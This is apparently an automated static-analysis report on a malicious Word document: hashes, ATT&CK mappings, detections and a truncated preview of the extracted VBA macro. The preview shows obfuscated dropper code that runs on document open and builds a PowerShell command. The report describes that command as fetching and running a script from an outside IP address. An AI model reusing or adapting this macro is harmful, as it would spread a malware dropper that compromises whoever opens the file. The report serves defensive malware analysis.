Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c413d4f2b81c5871…

MALICIOUS

Office (OLE)

Size: 247.5 KB
Created: 2018-07-09 18:11:00
Authoring application: Microsoft Office Word
First seen: 2018-07-27
MD5: 6d0514a4eca174d5c373a407cc0ac722
SHA-1: eb463f4c1987d1e84f1d16439f46bb621c41cf95
SHA-256: c413d4f2b81c58717d19fedfbaf5cea74542f23dc55afde48c8ca821c4d14fdf
Risk Score: 222

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes a Shell command. This macro is designed to run a PowerShell command that downloads and executes a script from the URL 'http://185.189.255.147/a.ps1'. This indicates downloader or dropper functionality, common in the initial stages of a compromise.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6605488-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6605488-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17521 bytes
SHA-256: 68579fa79c66198cb7d7e6ba42810e7e847df718a9060862080084be67141413
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "dfDNsOd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
   iICdz = 64039 - iDhuhF - wLZkJ / MOuXfv + qjbNj + hVcMT - RCIjZV / VRcIwJ - 95141 / BTNfw - PJCbT * MYfUz
   uGTwQR = 48675 - wALdVG - uEQfQk / qWWQP + DpkzBD + bWKJlC - BntWj / AAHqP - 91846 / kPwaz - qnHPO * SYUYtH
   SkMQt = 6811 - WOZJNV - EXjpQ / iusWAp + HLwipp + pRipUL - iDDZH / vktjWc - 86611 / XrqQDS - LRvUXZ * nsrUF
   mHJrAF = 63002 - oscziP - iwPaDr / GSlmqm + XPtibO + OlDjc - MVFVsm / bJpjQF - 14736 / rFOPu - RdiVD * pQMLt
LqqFAsdzEIjE ("" + fDiVCwZANXdEl + BOhUXCtGHFJ + JoJpHAsLBO + jvWmFzlr + KrpDaolSQ + KUSMkw + ozsHpXRQIMwVS + YQtYSlIEjIiwA)
   QjvpL = 43358 - uAujr - DKdTM / AtnYz + zIpfOz + rkGNQ - aDLGN / lsFXV - 79584 / tBqRcL - LOOUPm * NzlzwM
   HomaVO = 72824 - kUpnGR - SiCTL / prrbG + sUaZc + GtCfBp - ZWdAZw / wwSSts - 73381 / SzvzOq - XKvNKz * wncMl
   XQXjC = 87272 - wcKtB - HaDwOF / ELElF + sJzLaR + HojwlW - BUQOZj / zIEfi - 90946 / zLMla - BNwRj * bfSuFM
End Sub


Attribute VB_Name = "LrRcRatBHfjrj"
Function JoJpHAsLBO()
On Error Resume Next
EbcOj = (51328 / UZCkVQ / MzNjOF - Jqsoi - (95067 + ksnwj / 98512 * OcmLCP))
   RAwUbU = plaJZ + iMJvb * 97576 * 15531
   jTfzlz = Qpqwqv + jZzdYk * 63738 * 29181
KZnXZPK = "p" + itMNZrABRhqik + pUiGFUaKQP + "owe" + oFQiEJKTb + lwkYssSA + "rsh" + cmidiCWD + wIdMwBCmZahsZO + "ell" + UviRzOpG + mBZGnQsTH + "  " + YcrpjbBakN + VibVRzkTWAiO + "." + SmRzGGQn + qbRnnjbFW + "( $" + YMubWXJ + zcoUIPIkGJ + "pSH" + mIipjwjqYZsk + ZWXjiGpXVNnwfX + "O" + wMwVmEQmpbdHz + DMNplMXbNtOn + "M" + jRIShaj + IVGluHdiXwdj + "e[" + imibljcXQ + GJUoSwEQZFTf + "4]" + Chr(43) + TkLqrmSwAaj + vEKkFGBnzItFzZ + "$P" + LOGCwRwR + NSHJuHPwIL + "Sho" + OZZoWcRktM + oLZABdGtCftjj + "me["
lqzQI = rAhdJv + zwjAT * 39572 * 41298
   ktGzsP = SdDbB + CaZRBm * 1511 * 25012
   OzfFVR = jqIiPf + uwqqzL * 84761 * 44355
wYiZFGiWzdL = "30" + mEdiYYp + wVcLjnb + "]" + Chr(43) + lbSsKnPYu + qVdZDMolhuFO + "'X'" + ohwNhOLDzUsjut + AdzHObrDI + ")" + pPVfNiwVFRKMbY + IjTSuvStbO + "( " + NpuEKPWoboiB + kzpRXibDiW + "nE" + EuwbEwG + PWGCMCww + "w-" + SVWKVEK + EKHYPFLcsAkfuh + "O" + ajOLfdGOUW + jaWtHMKwIwqz + "bj" + GwjWXnHqvVw + bDsEtWisR + "EC"
XiWQLb = RKFWKi + zvZsfB * 95347 * 54755
   vPuzaW = pSswoQ + iTciUI * 8778 * 85315
ROpsAfU = "t i" + bEAmbtvjnVvhvq + hslwKiiOLY + "O" + qiCBoDzS + rzDEdVi + "." + ohkWAbHjwWla + ntISttsrVqi + "STR" + vFBMfZriaFIC + UDvvcoZPKVD + "Eam" + owLtrzpLdvJFB + NoAPTMYoZuCMNj + "Re" + IrfDiOLQDkU + lqaddCWU + "A" + jQIlzpmcfi + OVHNwck + "D" + shjnEcjjdXLU + mZcMbQIoHtkbEV + "er" + ukbloic + MCsCKDjrWVnVQJ + "( "
DanCcY = TZdbs + LDziRO * 27097 * 29458
   KRqrw = hMRdzw + qOrrzz * 24060 * 53861
   pEkhAb = ibjJkI + vSooYc * 64384 * 54197
lESjwYiqlLs = "( " + jwaZqKPN + XilrfjzzTfr + "nEw" + wajkicbdjWh + UHVHOji + "-O" + fGATSNiHP + XczJZjlpAnLE + "bj" + MrbMQHONiua + JNzbHQVds + "ECt" + hhwsMfUB + GVCvwJYJzEipS + " S" + BLEoNBUjPij + AwZZSYCrwf + "YS" + zTuDdrO + LUQNDommn + "Te" + BCJwiJXtY + fviQhZf + "m." + UlEoiJLOkQEJO + uKwYTTV + "IO." + HoUfnHMHBduP + TVzIJHivQC + "COM" + WdHSTznXhp + bdEzHkwpwqc + "PR" + KMqCLYRCQk + jKvbami + "ESs" + hfDhofEnZ + DwInzVW + "iO"
iKtUz = (aCOVE / XEdjmU - (44774 - NOrEiw + 75218 / 3435))
GufjoQE = "N" + PNHnWmi + FBZDbCfrf + ".D" + AzYJPTom + YukPolPRGuDk + "EFL" + MpndjQvWCTFQ + XDwwjijHoomRQa + "aTE" + HPrlzZfL + pCrRKYwRtDvH + "s" + GEAzqPAUwpM + CAzXmqwoiP + "TR" + OUwhVQzNOfs + VqjVDCETzuR + "ea" + IQDobpcVbvC + ZMcKWHYrRAO + "M( " + NSJPZjlpHiK + DwKtvhi + "[s" + sroXJXnrQoV + JLLVVBnRdSk + "Y" + bhXEhlA + SaBXOBQSWFD + "st" + wiaMjnLOYEFF + TMHjArjs + "e" + wnmBLwiOdp + iVENZMtWwSSuw + "M." + VDjDFwGNs + DcZrbGYi + "i"
WSYdp = (QjGji / XJFzvP - (62320 - UvnJiS + 51271 / 7148))
   fmSXwO = (jUrEF / JKtlcq - (46017 - MMOJR + 92757 / 9508))
GKaSSXd = "O." + SpIVljE
... (truncated)